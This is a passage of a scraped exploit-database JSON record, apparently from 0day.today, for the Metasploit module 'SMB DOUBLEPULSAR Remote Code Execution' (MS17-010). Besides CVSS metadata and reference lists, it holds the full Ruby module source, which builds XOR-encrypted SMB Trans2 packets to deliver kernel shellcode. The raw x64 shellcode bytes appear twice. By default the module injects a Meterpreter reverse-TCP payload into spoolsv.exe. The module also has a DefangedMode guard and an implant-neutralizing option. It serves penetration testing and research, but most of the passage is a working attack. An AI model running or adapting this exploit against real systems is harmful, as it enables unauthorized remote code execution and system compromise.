\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-09] #"}, "lastseen": "2021-09-08T22:11:20", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "e57caa717ccad756d6a4a3bac91dd524", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-09T22:14:51", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27803", "1337DAY-ID-27786", 
"1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96709", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-09T22:14:51", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T22:14:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 
'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n 